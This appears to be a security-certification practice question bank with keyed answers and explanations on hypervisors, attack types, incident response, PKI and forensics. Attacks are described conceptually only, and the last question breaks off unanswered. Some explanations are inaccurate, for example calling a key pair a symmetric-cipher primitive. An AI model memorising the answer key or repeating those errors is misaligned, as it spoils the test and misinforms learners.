Examine the features of different virtual platform implementations and select the statement that best describes the difference between a Type I and a Type II hypervisor. A. A Type II hypervisor installs on a host OS that manages virtual machines. A Type I (or "bare metal") hypervisor interfaces directly with the host hardware. B. A Type I hypervisor installs directly on a host OS to manage virtual machines, while a Type II hypervisor interfaces directly with the host hardware. C. A Type I hypervisor must be compatible with the host OS, while a Type II hypervisor needs only support the base system requirements for the hypervisor, plus resources for the installed guest OSes. D. A host-based hypervisor interfaces directly with the host hardware, whereas a Type I hypervisor installs as software that runs virtual machines.
A. In a guest OS (or host-based) system, the hypervisor application (known as a Type II hypervisor) is itself installed onto a host operating system. The hypervisor software must support the host OS. A bare metal virtual platform means that the hypervisor (Type I hypervisor) installs directly onto the computer and manages access to the host hardware without going through a host OS. For a Type I hypervisor, the hardware needs only support the base system requirements for the hypervisor, plus resources for the type and number of guest operating systems that will be installed. One basic distinction between virtual platforms is between host and bare metal methods of interacting with the host hardware.
Which of the following statements best contrasts between a service-oriented architecture (SOA) model and a microservices-based model? A. SOA can build services from other services, while an implementation of microservices develops, tests, and deploys microservices independently. B. Microservices are loosely decoupled, while SOA services are considered highly decoupled. C. SOA focuses on making a single, discrete task easily repeatable, while microservices perform a sequence of automated tasks. D. Microservices help to make a network's design architecture fit a business's requirements, rather than accommodating the business workflow to the platform requirements, as in SOA.
A. SOA allows a service to build from other services. By contrast, each microservice should be capable of being developed, tested, and deployed independently. The microservices can be described as highly decoupled rather than just loosely decoupled. Services and clients requesting services do not have as many compatibility restraints with SOA as with monolithic applications; the independence between the client and service is referred to as loose coupling. Where automation focuses on making a single, discrete task easily repeatable, orchestration performs a sequence of automated tasks. Virtualization helps to make the design architecture fit to the business requirement rather than accommodate the business workflow to the platform requirement.
A retail establishment experiences an attack where whole number values have been exploited. As a result, some credit values are manipulated from positive values to negative values. Which type of attack is the establishment dealing with? A. Integer overflow B. Buffer overflow C. Stack overflow D. Race condition
A. An integer overflow attack causes the target software to calculate a value that exceeds the bounds of its integer type. This may cause a positive number to become negative. A buffer is an area of memory that the application reserves to store expected data. To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer. A stack is an area of memory used by a program. It includes a return address, which is the location of the program that called the subroutine. An attacker could use a buffer overflow to change the return address. Race conditions occur when the outcome of an execution process depends directly on the order and timing of certain events, and those events fail to occur in the order intended.
Identify the type of attack where malware forces a legitimate process to load a malicious link library. A. DLL injection B. Pass the hash (PtH) C. Null pointer dereferencing D. Overflow attack
A. DLL injection is a vulnerability in the way the operating system allows one process to attach to another. Malware can abuse this functionality to force a legitimate process to load a malicious link library. In a pass the hash (PtH) attack, the attacker harvests an account's cached credentials when the user logs into a single sign-on (SSO) system. Attempting to read or write a memory address via a pointer is called dereferencing. If the memory location is invalid or null, this creates a null pointer dereference type of exception and the process may crash. In an overflow attack, the threat actor submits input that is too large to store in an application variable.
A user at a realtor's office contacts their IT department to report that they are not able to copy contract files to a USB flash drive to take home. Which explanation does the IT representative share with the user? A. Data loss prevention prevents file copying. B. Mobile device management restricts the use of a portable USB device. C. A compromised private key has created a trust issue. D. The file copy process has been allow-listed.
A. Data loss prevention (DLP) performs a copy protection function based on policies. It does not govern file access, but it mediates the copying of certain tagged data to restrict it to authorized media and services. Mobile Device Management (MDM) provides execution control over apps and features of smartphones. Features include GPS, camera, and microphone. If a host is compromised, the private key it used for digital signatures, or digital envelopes for messaging and communications, is no longer safe. This is outside the function of a file copy. An execution control policy defines applications that can or cannot be run. An allow list denies execution unless the process is explicitly authorized.
A security analytics team is threat hunting on a Windows network. What type of activity is most likely to alert the team to an insider attack? A. A user without privileged access executes PowerShell Invoke-Command cmdlet. B. A privileged user account executes PowerShell Invoke-Command cmdlet. C. A user without privileged access uses a Bash command whoami to locate users on the local network. D. A privileged user account uses Constrained Language Mode (CLM) and signed scripts.
A. Lateral movement or an insider attack uses access to execute a process remotely, using a tool such as psexec or PowerShell. These commands can blend in with ordinary network operations, though they could be anomalous behavior for a non-privileged account. Cmdlets, such as Invoke-Expression, can indicate an attempt to run some type of binary shellcode. Privileged users' use of PowerShell is far less suspicious than a non-privileged user executing the same commands. A malicious script running on a Linux host might attempt to use commands, such as whoami and ifconfig/ip/route to establish the local context. The use of CLM and signed scripts indicate legitimate behavior and can limit the ability to exploit code to run on high-value target systems.
Which of the following authentication procedures effectively employs multifactor authentication? A. A password reset prompt requires the user to supply the answer to several recovery questions. B. A system login requires a user to insert a smart card and enter a PIN. C. An entry control point employs a security guard and requires entrants to submit to a retinal scan. D. A system login requires a user to enter a password, PIN, and passphrase.
B A login prompt that requires both a physical object the user holds and a PIN the user knows employs multifactor authentication. The password reset prompt uses only single-factor authentication. If the password reset process also sent a one-time code to an authorized device, then it would be multifactor authentication, requiring both something the user knows and something the user has. A security guard is a physical access control, but not an authentication mechanism. The retinal scan is a single-factor authentication mechanism. Passwords, PINs, and passphrases all fall under the category of "something you know" authentication. Multifactor authentication requires the use of at least two factors.
A company without an internal IT team hires a service provider to monitor a computer network for security issues. Before the service provider is given access, which agreement is put in place to establish expectations? A. NDA B. SLA C. ISA D. PII
B A service level agreement (SLA) is a contractual agreement setting out the detailed terms or expectations under which a service is provided. A nondisclosure agreement (NDA) provides a legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. Interconnection security agreements (ISA) are used for integrating systems. Any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. Personally identifiable information (PII) is data that can be used to identify, contact, or locate an individual. A Social Security Number (SSN) is an example of PII.
Which security-related phrase relates to the integrity of data? A. Availability B. Modification C. Confidentiality D. Risk
B Integrity of data means that any modification is authorized and that the data is stored and transferred as intended. Integrity is part of the CIA triad. Availability means that any information is accessible to those authorized to view or modify it. Availability is part of the CIA triad. Confidentiality means that certain information should only be known to certain people. Confidentiality is part of the CIA triad. Risk is the likelihood and impact (or consequence) of a threat actor exploiting a vulnerability.
An employee suspected of storing illicit content on a company computer discovers a plan to investigate, so the employee tries to hide evidence of wrongdoing. The employee deletes the illicit files and attempts to overwrite them. If a forensics investigation can discover the lost files, which statement best describes how? A. The forensics investigation will not be able to locate the lost files. B. The forensics investigator can retrieve fragments of deleted or overwritten files. C. The forensics investigator must use a live acquisition tool to retrieve files in recent memory. D. The forensics investigation can uncover the lost data using a cache acquisition tool.
B Data recovery refers to analyzing a disk (or image of a disk) for file fragments stored in slack space, which might represent deleted or overwritten files. Carving is the process of recovering them: extracting data from a computer when that data has no associated file system metadata. Live acquisition copies data while the host is still running. Disk image acquisition obtains data from non-volatile storage. Data recovery can use a disk image. Cache can refer either to hardware components or software. Software-based cache is stored in the file system and can be acquired as part of a disk image. Contents of a hardware cache (CPU registers and disk controller read/write cache, for instance) are not generally recoverable.
A large data facility just experienced a disaster-level event, and the IT team is in the process of reconstituting systems. Which statement illustrates the appropriate first step the team should take in this process? A. First, the team should enable and test switch infrastructure, then routing appliances and systems. B. First, the team should enable and test power delivery systems, including grid power, power distribution units (PDUs), uninterruptible power supplies (UPS), and secondary generators. C. First, the team should enable and test network security appliances, including firewalls, intrusion detection systems (IDS), and proxies. D. First, the team should enable and test critical network servers, including dynamic host configuration protocol (DHCP), domain name system (DNS), network time protocol (NTP), and directory services.
B If systems come back online in an uncontrolled way, there is the serious risk of causing additional power problems or of causing problems in the network, OS, or application layers because dependencies between different appliances and servers have not been met. The first step in the process is enabling and testing power delivery systems (grid power, power distribution units (PDUs), UPS, secondary generators, and so on). Secondly, the team should enable and test switch infrastructure, then routing appliances and systems. The third step is to enable and test network security appliances (firewalls, IDS, proxies). The fourth step is enabling and testing critical network servers (DHCP, DNS, NTP, and directory services).
An intrusion prevention system (IPS) generates an incident report for some suspicious user activity, which prompts a system administrator to investigate a possible insider attack. Analyze the scenario and determine what type of IPS profile led to this discovery. A. Signature-based detection B. Behavioral-based detection C. Host-based intrusion detection D. Web application firewall (WAF) detection
B In behavioral-based detection, the engine recognizes deviations from a baseline of "normal" traffic or events, which can help identify zero-day attacks, insider threats, and other malicious activity. Signature-based detection (or pattern-matching) means that the engine is loaded with a database of attack patterns or signatures. If traffic matches a pattern, then the engine generates an incident. A host-based IDS (HIDS) captures information from a single host, such as a server, router, or firewall. HIDS software produces a log that shows which process initiated the event and what resources on the host were affected. A web application firewall (WAF) is designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks.
A company located in the western United States that uses cloud computing relies on redundant systems in adjacent availability zones for data backup and storage. Analyze the configuration and determine which level of high availability service the company utilizes. A. Local replication B. Regional replication C. Geo-redundant storage (GRS) D. Cloud service replication
B Regional replication (also called zone-redundant storage) replicates data across multiple data centers within one or two regions. This safeguards data and access in the event a single data center is destroyed or goes offline. Local replication replicates data within a single data center in the region where the company created its storage account. Replicas are often in separate fault domains and upgrade domains. Geo-redundant storage (GRS) replicates data to a secondary region that is distant from the primary region. This safeguards data in the event of a regional outage or a disaster. Data replication allows businesses to copy data to where the business can utilize it most effectively. Data replication requires low latency network connections, security, and data integrity.
A company performing a risk assessment calculates how much return the company has saved by implementing a security measure. Which formula will they use to calculate this metric? A. Asset value x EF B. [(ALE-ALEm)-Cost of Solution]/Cost of Solution C. SLE x ARO D. (ALE-SLE)/Cost of Solution
B Return on Security Investment (ROSI) calculates a new ALE, based on reduction in loss by new security controls. ROSI is: [(ALE - ALEm) - Cost of Solution] / Cost of Solution, where ALE is before controls and ALEm is after controls. Single Loss Expectancy (SLE) is the potential loss from a single event. Multiplying the value of the asset by an Exposure Factor (EF), where EF is the percentage of an asset lost, gives the SLE. Annualized Loss Expectancy (ALE) is the potential for loss over the course of a year. Multiplying the SLE by the Annualized Rate of Occurrence (ARO) gives the ALE. Annualized Loss Expectancy (ALE) is a yearly figure, while Single Loss Expectancy (SLE) measures a single event.
A user attempts to use a smart card for Kerberos authentication. If the user is successfully authenticated, how does the authentication server respond? A. A user certificate is issued B. A session key is issued C. A public key is issued D. A CA certificate is issued
B When authentication is complete, the authentication server responds with a Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) session key. The authentication server is able to decrypt a TGT request because it has a matching public key and trusts the user's certificate. The certificate is not issued. A smart card's cryptoprocessor uses its private key to create a Ticket Granting Ticket (TGT) request, which is transmitted to the authentication server (AS). The private key is used with a matching public key. A user's certificate is issued by a local certification authority or by a third-party CA that is a trusted root CA. This is a certificate the user has and is not issued during the authentication process.
Which phases of the Incident Response Process involve determining if an attack happened and mitigating its effects? (Select all that apply.) A. Eradication B. Identification C. Containment D. Preparation
B and C Identification is the step where information from an alert or report is used to determine whether an incident has taken place, assess how severe it might be (triage), and notify stakeholders. Containment is the step to limit the scope and magnitude of the incident. The principal aim of incident response is to secure data while limiting the immediate impact. Eradication is the step to remove the cause and restore the affected system to a secure state by wiping a system and applying secure configuration settings. Preparation is the precursor step to make the system resilient to attack in the first place. This includes hardening systems, writing policies and procedures, and setting up confidential lines of communication.
An engineering firm provisions microwave technology for a wide area communications project. When using point-to-multipoint (P2M) mode, which technologies does the firm put in place? (Select all that apply.) A. Directional antennas B. Sectoral antennas C. Multiple sites connected to a single hub D. High gain link between two sites
B and C Point-to-multipoint (P2M) microwave links multiple sites and uses smaller sectoral antennas than P2P, each covering a separate quadrant. P2M links multiple sites or subscriber nodes to a single hub. This can be more cost-efficient in high density urban areas and requires less radio spectrum. A high gain connection means that the antennas used between sites are highly directional. Each antenna is pointed directly at the other. Point-to-point (P2P) microwave uses high gain antennas to link two sites. The satellite modems or routers are also normally paired to one another.
An engineer routinely provides data to a source that compiles threat intelligence information. The engineer focuses on behavioral threat research. Which information does the engineer provide? A. IP addresses associated with malicious behavior B. Descriptions of example attacks C. Correlation of events observed with known actor indicators D. Data available as a paid subscription
B. Behavioral threat research is narrative commentary describing examples of attacks and TTPs gathered through primary research sources. Reputational threat intelligence includes lists of IP addresses and domains associated with malicious behavior, plus signatures of known file-based malware. Threat data is computer data that can correlate events observed on a customer's own networks and logs with known TTP and threat actor indicators. Data that is part of a closed/proprietary system is made available as a paid subscription to a commercial threat intelligence platform. There is no mention of a subscription model in this case.
Systems administrators configure an application suite that uses a collection of single hash functions and symmetric ciphers to protect sensitive communication. While the suite uses these security features collectively, how is each instance recognized? A. As non-repudiation B. As a cryptographic system C. As a cryptographic primitive D. As a key pair
C A single hash function, symmetric cipher, or asymmetric cipher is called a cryptographic primitive. The properties of different symmetric/asymmetric/hash types and of specific ciphers for each type impose limitations when used alone. Non-repudiation depends on a recipient not being able to encrypt the message, or the recipient would be able to impersonate the sender. A complete cryptographic system or product is likely to use multiple cryptographic primitives, such as within a cipher suite. To use a key pair, the user or server generates the linked keys. These keys are an example of a cryptographic primitive that uses a symmetric cipher.
A company's IT department pushes system updates and configures user permissions from the same shared account. Which statement best describes how this practice is problematic? A. This practice relies on a single point of failure. B. This practice breaks data integrity. C. This practice breaks non-repudiation. D. This practice fails to properly separate duties among users.
C Admins should replace the default superuser with named accounts that have sufficient elevated privileges for a given job role. This ensures that admins can audit administrative activity and that the system conforms to non-repudiation. Password changes to a shared account represent a risk. Passwords need to be changed often, and distributing new passwords to shared account users poses a challenge to password security. A shared account breaks the principle of non-repudiation and makes an accurate audit trail difficult to establish. Separation of duties is a means of establishing checks and balances against the possibility that critical systems or procedures can be compromised by insider threats. The company should divide duties and responsibilities among individuals to prevent ethical conflicts or abuse of powers.
A new systems administrator at an organization has a difficult time understanding some of the configurations from the previous IT staff. It appears many shortcuts were taken to keep systems running and users happy. Which weakness does the administrator report this configuration as? A. Complex dependencies B. Overdependence on perimeter security C. Availability over confidentiality and integrity D. Single points of failure
C Availability over confidentiality and integrity is often presented by taking "shortcuts" to get a service up and running. Compromising security might represent a quick fix but creates long term risks. Complex dependencies may include services that require many different systems to be available. Ideally, the failure of individual systems or services should not affect the overall performance of other network services. Overdependence on perimeter security can occur if the network architecture is "flat." Penetrating the network edge gives the attacker freedom of movement. A single point of failure is a "pinch point" in a network that may rely on a single hardware server or appliance.
Compare the advantages and disadvantages of certificate revocation versus suspension and select the scenario that presents the best argument for certificate revocation. A. An online business changed its domain name. B. An administrative user left his/her company. C. A banking website's private key may have been compromised. D. A key used for encryption is accidentally destroyed.
C If a private key is compromised, the admin can revoke the key pair to prevent users from trusting the public key. CAs maintain a certificate revocation list (CRL) of all revoked and suspended certificates. A CA or certificate owner may revoke or suspend a certificate for a variety of reasons. If the reason is for a domain name change and not because of compromise or misuse, suspension may be preferable. If a departing administrative user has not compromised data, certificate revocation may be unnecessary, and other security measures may be more appropriate to secure assets. If the key used to decrypt data is lost or damaged, the admin cannot recover the encrypted data, unless they made a backup of the key.
A new security technician is tasked with sanitizing data on solid state drives (SSD). The technician first uses a degaussing magnet and then smashes the drives with a hammer. What is the likely result of this sanitization attempt? A. The drives are now sufficiently sanitized. B. The degaussing magnet failed to destroy media on the SSD, but smashing the drives with a hammer makes data permanently irrecoverable. C. Degaussing fails to destroy media on the SSD, and smashing by hammer may leave a significant amount of data recoverable. D. The degaussing magnet successfully destroyed media on the SSD, but smashing by hammer is an ineffective physical sanitization measure.
C Media sanitization and remnant removal erase data from hard drives, flash drives/SSDs, tape media, and CD and DVD ROMs before disposing of them or putting them to a different use. Degaussing does not work with SSDs, and a hammer is an ineffective physical sanitization measure. SSDs, flash media, and optical media cannot be degaussed, as degaussing only works for hard disk drives. Degaussing involves exposing a hard disk to a powerful electromagnet, which disrupts the magnetic pattern that stores the data on the disk surface. SSDs store data on NAND chips, not magnetically, so degaussing, which specifically targets magnetic media, will not destroy data on an SSD. Hitting a drive with a hammer can leave a surprising amount of recoverable data, so destruction by pulverization should use industrial machinery rather than hammers to ensure the media is destroyed.
Company policy prohibits employees from taking any type of portable computing or storage device other than managed laptops identified by RFID tags into an equipment room. Video surveillance has been implemented within the equipment room. As part of a compliance audit, you must classify the surveillance control. Which single classification is BEST suited to classifying the surveillance system? A. Operational B. Corrective C. Physical D. Managerial
C Physical is a way of classifying controls by characteristic and refers to things that operate in the built environment, such as locks, badge readers, security guards, video surveillance, and lighting. Operational is a way of classifying controls by characteristic and refers to things that bind the way people should behave, such as procedural and policy-based controls. Corrective is a way of classifying controls by function and refers to the set of controls that operate to mitigate an event that has already happened, such as using backup software to recover from destruction of data files. Managerial is a way of classifying controls by characteristic and refers to controls that give insight and reporting into the whole security system, such as risk assessment and compliance monitoring.
A security information and event management (SIEM) handler's dashboard provides graphical representations of user profile trends. The graphic contrasts standard user activity with administrative user activity and flags activity that deviates from these clusters. This graphical representation utilizes which trend analysis methodology? A. Frequency-based trend analysis B. Volume based trend analysis C. Statistical deviation analysis D. Syslog trend analysis
C Statistical deviation analysis can alert security admin to a suspicious data point. A cluster graph might show activity by standard users and privileged users, and data points outside these clusters may indicate suspicious account activity. Frequency-based trend analysis establishes a baseline for a metric, and if frequency exceeds the baseline threshold, then the system raises an alert. Volume-based trend analysis uses simpler indicators, such as log or network traffic volume, or endpoint disk usage. Unusual log growth needs investigating, and unexpected disk capacity may signify data exfiltration. Syslog provides an open format, protocol, and server software for logging event messages. A very wide range of host types use Syslog.
An investigator needs to analyze all data on a system. Which file does the investigator review if it contains data while in use when physical RAM in a system is exceeded? A. Hibernation file B. Dump file C. Swap file D. Temp file
C The pagefile/swap file/swap partition stores pages of memory in use that exceed the capacity of the host's RAM modules. The pagefile is not structured in a way that analysis tools can interpret, but it is possible to search it for strings. A hibernation file is created on disk in the root folder of the boot volume when a Windows host is put into a sleep state. When Windows encounters an unrecoverable kernel error, it can write the contents of memory to a dump file. A temp, or temporary, file is a file that is created under certain circumstances, such as when software is installed or when a file is currently open in an application.
Analyze the following statements and select the one that describes key differences between internet protocol security (IPSec) modes. A. Transport mode allows communication between virtual private networks (VPNs), while tunnel mode secures communications between hosts on a private network. B. Authentication Header (AH) mode provides confidentiality, as the payload is encrypted. Encapsulation Security Payload (ESP) mode does not provide confidentiality and/or authentication and integrity. C. Tunnel mode allows communication between virtual private networks (VPNs), while transport mode secures communications between hosts on a private network. D. Encapsulation Security Payload (ESP) mode does not provide confidentiality, as the payload is not encrypted. Authentication Header (AH) mode provides confidentiality and/or authentication and integrity.
C Tunnel mode, also called router implementation, creates a virtual private network (VPN), allowing communications between VPN gateways across an unsecure network. Transport mode secures communications between hosts on a private network (an end-to-end implementation). The AH protocol authenticates the origin of transmitted data and provides integrity and protection against replay attacks. The payload is not encrypted, so this protocol does not provide confidentiality. ESP is an IPSec sub-protocol that enables encryption and authentication of a data packet's header and payload. Encapsulation Security Payload (ESP) provides confidentiality and/or authentication and integrity, and can be used to encrypt the packet.
An organization installs embedded systems throughout a manufacturing plant. When planning the install, engineers had to consider system constraints related to identification. As a result, which areas of the systems are impacted? (Select all that apply.) A. PC B. Network C. Compute resources D. Authentication
C and D The lack of compute resources means that embedded systems are not well-matched to the cryptographic identification technologies that are widely used on computer networks. As embedded systems become more accessible, they will need to use authentication technologies to ensure consistent confidentiality, integrity, and availability. A PC is a dynamic environment. The user can add or remove programs and data files, install new hardware components, and upgrade the operating system. A static environment does not allow or require such frequent changes. Networks for embedded systems emphasize the power-efficient transfer of small amounts of data with a high degree of reliability and low latency.
Compare the types of Distributed Denial of Service (DDoS) attacks and select the best example of a synchronize (SYN) flood attack. A. A group of attackers work together to form an attack on a network. B. An attack consumes all of the network bandwidth resulting in denial to legitimate hosts. C. Client IP addresses are spoofed to misdirect the server's SYN/ACK packet increasing session queues. D. A client's IP address is spoofed and pings the broadcast address of a third-party network with many hosts.
C. A SYN flood attack works by withholding the clients' ACK packets during TCP's three-way handshake, which increases the server's session queue and prevents other legitimate clients from connecting. The server will continue to send SYN/ACK packets because there is no acknowledgment and will not time out until some time later. A coordinated attack occurs when a group of attackers engage together against a well-known company or government institution. DDoS attacks can be simple and just focus on consuming network bandwidth, resulting in denial of service to legitimate hosts. A smurf attack occurs when the adversary spoofs the client's IP address and then pings the broadcast address of a third-party network with many hosts. This is known as an amplification attack.
A junior engineer suspects there is a breached system based on an alert received from a software monitor. The use of the alert provides which information to the engineer? A. TTP B. CTI C. IoC D. ISAC
C. An indicator of compromise (IoC) is a residual sign that an asset or network has been successfully attacked or is continuing to be attacked and provides evidence of a TTP. A tactic, technique, or procedure (TTP) is a generalized statement of adversary behavior. TTPs categorize behaviors in terms of a campaign strategy. Threat data can be packaged as feeds that integrate with a security information and event management (SIEM) platform. These feeds are usually described as cyber threat intelligence (CTI) data. Public/private information sharing centers are utilized in many critical industries. Information Sharing and Analysis Centers (ISAC) are set up to share threat intelligence and promote best practices.
The IT staff at a large company review numerous security logs and discover that the SAM database on Windows workstations is being accessed by a malicious process. What does the staff determine the issue to be? A. Shellcode B. Persistence C. Credential dumping D. Lateral movement
C. Credential dumping is a method used to access the credentials file (SAM on a local Windows workstation) or sniff credentials held in memory by the lsass.exe system process. Shellcode is a minimal program designed to exploit a buffer overflow or similar vulnerability to gain privileges to a system. Persistence is a mechanism that maintains a connection if the threat actor's backdoor is restarted, if the host reboots, or if the user logs off. With lateral movement, the attacker might be seeking data assets or may try to widen access by changing the system security configuration.
An organization hires a pen tester. The tester achieves a connection to a perimeter server. Which technique allows the tester to bypass a network boundary from this advantage? A. Persistence B. Privilege escalation C. Pivoting D. Lateral movement
C. If the pen tester achieves a foothold on a perimeter server, a pivot allows them to bypass a network boundary and compromise servers on an inside network. Persistence is the tester's ability to reconnect to the compromised host and use it as a remote access tool (RAT) or backdoor. A pen tester enumerates running services and their associated accounts in an attempt to escalate privileges and gain further access. Lateral movement is the action of gaining control over other hosts. This is done partly to discover more opportunities to widen access, partly to identify where valuable data assets might be located, and partly to evade detection.
Consider an abstract model of network functions for an infrastructure as code (IaC) implementation and determine which plane describes how traffic is prioritized. A. Data B. Management C. Control D. Application
C. The control plane makes decisions about how traffic should be prioritized, secured, and switched. A software-defined networking (SDN) application can be used to define policy decisions. The data plane handles the actual switching and routing of traffic and imposition of security access controls. Decisions made in the control plane are implemented on the data plane. The management plane is used to monitor traffic conditions and network status. SDN can be used to manage compatible physical appliances, but also virtual switches, routers, and firewalls. Applications interface with network devices by using APIs. The interface between the SDN applications and the SDN controller is described as the "northbound" API, while that between the controller and appliances is the "southbound" API.
A customer responds to an email advertisement that appears to link to mystore.com. The customer logs into the website with their username and password. The website has the same homepage the customer is familiar with, but it is actually a page set up by an attacker to gain credentials. The attacker can then login to mystore.com with the user's credentials, and shop using the saved credit card on file. Which type of attack has occurred in this scenario? A. Denial of Service (DoS) B. DNS client cache poisoning C. Pharming D. Pollution
C. A pharming attack occurs when the attacker compromises the process of Domain Name System (DNS) resolution to replace the valid IP address for a trusted website. The attacker can then receive all of the packets directed to the site designed to fool the user into thinking it is genuine. A Denial of Service (DoS) attack can occur by directing all traffic for a particular fully qualified domain name to an invalid IP address (black hole). DNS client cache poisoning occurs when an attacker modifies the HOSTS file to redirect traffic. Pollution is another name for DNS server cache poisoning. It is a redirection attack that aims to corrupt the records held by the DNS server.
A systems administrator uses a disk image to provision new workstations. After installing several workstations, it is found that they no longer boot. It is possible that the disk image in use included malicious code. Which specific method has stopped the systems from starting? A. UEFI B. Measured boot C. Secure boot D. Boot attestation
C. Secure boot is designed to prevent a computer from being hijacked by a malicious OS. UEFI is configured with digital certificates from valid OS vendors to verify legitimacy. Unified extensible firmware interface (UEFI) provides code that allows the host to boot to an OS. UEFI can enforce a number of boot integrity checks. A measured boot process uses the trusted platform module (TPM) at each stage in the boot process to check whether hashes of key system state data have changed. This does not usually prevent booting. Boot attestation is the capability to transmit a boot log report signed by the TPM via a trusted process to a remote server.
An end-user has enabled cookies for several e-commerce websites and has started receiving targeted ads. The ads do not trouble the user until, when trying to access an e-commerce site, the user gets several pop-up ads that automatically redirect the user to suspicious sites the user did not intend to visit. What is the most likely explanation for this phenomenon? A. Tracking cookies have infected the user's computer. B. Ransomware has infected the user's computer. C. Spyware has infected the user's computer. D. Crypto-malware has infected the user's computer.
C. Spyware can perform adware-like tracking and monitor local activity. Another spyware technique is to perform domain name service (DNS) redirection to pharming sites. Cookies are not malware, but if browser settings allow third-party cookies, they can record pages visited, search queries, browser metadata, and IP addresses. Ransomware is a type of Trojan malware that tries to extort money from the victim. It will display threatening messages, stating the computer will remain locked until the victim pays the ransom. Crypto-malware is a class of ransomware that attempts to encrypt data files. The user will be unable to access the files without obtaining the private encryption key, which is held by the attacker.
Consider the Public Key Infrastructure (PKI) Trust Model. Which of the following best protects against compromise? A. Single CA B. Intermediate CA C. Self-signed CA D. Offline CA
D An offline Certificate Authority (CA) is where the root CA has been disconnected from the network to protect it from compromise. Therefore, it is not a single point of failure. A single CA issues certificates to users, but is very exposed. If it is compromised, the whole PKI collapses. In a hierarchical model, the root CA issues certificates to several intermediate CAs, diluting risk. However, the root is still a single point of failure. A self-signed certificate is a type of digital certificate that is owned by the entity that signs it, which makes it a single CA, or root.
A security investigator compiles a report for an organization that lost data in a breach. Which ethical approach does the investigator apply while collecting data for the report? A. Search for relevant information B. Apply standard tags to files C. Disclosing of evidence D. Using repeatable methods
D Analysis methods should follow strong ethical principles and must be repeatable by third parties with access to the same evidence. This can indicate that any evidence has not been changed or manipulated. Searching information through e-discovery allows investigators to locate files of interest to the case. As well as keyword search, software might support semantic search. Applying standardized keywords or tags to files and metadata helps to organize evidence. Tags might be used to indicate relevancy to a case or part of a case. Disclosure is an important part of trial procedure. Disclosure states that the same evidence be made available to both plaintiff and defendant.
Which statement best illustrates the advantages and disadvantages of using asymmetric encryption? A. Asymmetric encryption is ideal for bulk encryption, but it is not suitable for proving a user's identity. B. Asymmetric encryption provides non-repudiation, but it is not ideal for secure distribution and storage of a private key. C. Asymmetric encryption is ideal for encrypting communications where the total length of the message is not known, but it requires significant overhead computing. D. Asymmetric encryption is ideal for proving identity, but it requires significant computing overhead and is inefficient for bulk encryption.
D Another user cannot impersonate a private key holder, so asymmetric encryption proves identity. The public and private keys are linked in such a way as to make it impossible to derive one from the other. The drawback of asymmetric encryption is that it involves substantial computing overhead compared to symmetric encryption. Symmetric encryption is very fast. It is used for bulk encryption of large amounts of data. The main problem is secure key distribution and storage. In a stream cipher, each byte or bit of data in the plaintext is encrypted one at a time. This is suitable for encrypting communications where the total length of the message is not known.
The Human Resources department issues a policy at an organization to govern the use of company owned computer equipment. Which behavior type does this policy address? A. Code of conduct B. Clean desk C. Bring your own device D. Acceptable use
D Enforcing an acceptable use policy (AUP) is important to protect the organization from the security and legal implications of employees misusing its equipment. A code of conduct, or rules of behavior, sets out expected professional standards. For example, employees' use of social media may be harmful to the company. A clean desk policy means that each employee's work area should be free from any documents left there. This helps to hide confidential information. Portable devices, such as smartphones, USB sticks, media players, and so on, pose a considerable threat to data security. Rules should be outlined in a bring your own device (BYOD) policy.
After a break-in at a government laboratory, some proprietary information was stolen and leaked. Which statement best summarizes how the laboratory can implement security controls to prevent future breaches? A. The laboratory needs to take detective action and should implement physical and deterrent controls in the future. B. The laboratory needs to take detective action and should implement corrective controls in the future. C. The laboratory needs to take compensatory action and should implement physical controls in the future. D. The laboratory needs to take corrective action and should implement both physical and preventative controls in the future.
D Following a break-in that included both physical intrusion and data compromise, the lab should take corrective action to reduce the impact of the intrusion event. Implementing preventative measures can help secure data from future attacks, and physical controls can mitigate the probability of future physical break-ins. Deterrent controls, such as warning signs, may not physically or logically prevent access, but psychologically discourage attackers from attempting an intrusion. Detective controls, such as logs, which operate during an attack, may not prevent or deter access, but they will identify and record any attempted or successful intrusion. Compensating controls serve as a substitute for a principal control, but corrective controls reduce the impact of an intrusion event.
A web server receives data from an application. It appears that passing this data causes an issue that evolves into an overflow at the destination. What process on the receiving server should be investigated? A. Normalization B. Output encoding C. Error handling D. Input validation
D Input could include user data entered into a form or a URL passed by another application as a URL or HTTP header. Malicious input could be crafted to perform an overflow attack. Input validation checks for proper input. Normalization means that a string of characters is stripped of illegal characters or substrings and converted to the accepted character set. Output encoding means that a string of characters is re-encoded safely for the context in which it is being used. A well-written application must be able to handle errors and exceptions gracefully. This means that the application performs in a controlled way when something unpredictable happens.
As part of updating a company's compliance documentation, you are classifying security controls used by the company. The company's app uses an IP geolocation database to determine whether to trigger a secondary authentication method. What type of authentication design should this be categorized as? A. Something you can do authentication. B. Something you exhibit authentication. C. Something you have authentication. D. Somewhere you are authentication.
D Something you can do refers to physical behavioral characteristics, such as the way you walk (gait). Something you exhibit authentication refers to profiling behavioral patterns. Something you have authentication tests ownership or possession of a trusted device. Somewhere you are authentication measures the subject's current location, using various services.
During weekly scans, a system administrator identifies a system that has software installed that goes against security policy. The system administrator removes the system from the network in an attempt to limit the effect of the incident on the remainder of the network. After the system administrator removes the unauthorized software and completes additional scans, the system administrator places the system back on the network. Applying information from the Computer Security Incident Handling Guide, determine the next step the system administrator should take to mitigate the effects of the incident and restore the network to optimal functionality. A. The system administrator should put controls in place to prevent the software from being installed. B. The system administrator should complete an initial scan to determine if unauthorized software is installed, then fully document the incident. C. The system administrator should remove the system from the network, remove the unauthorized software, and then place the system back into operation. D. The system administrator should determine how the unauthorized software was installed and identify what security to modify to prevent future incidents, then fully document the incident.
D The containment, eradication, and recovery stage was completed by removing the system from the network, removing the software, and placing the system back into operation. The system administrator will move to the lessons learned stage. This stage will include determining how the software was installed and will identify what should be modified to prevent the incident from reoccurring. This is also the stage where the incident will be fully documented. The preparation stage is where the system administrator put controls in place to prevent the software from being installed. The identification stage occurred when the scan was conducted and the unauthorized software was identified.
A suspected network breach prompts an engineer to investigate. The engineer utilizes a set of command line tools to collect network routing data. While doing so, the engineer discovers that UDP communications is not working as expected. Which tool does the engineer experience difficulty with? A. route B. tracert C. pathping D. traceroute
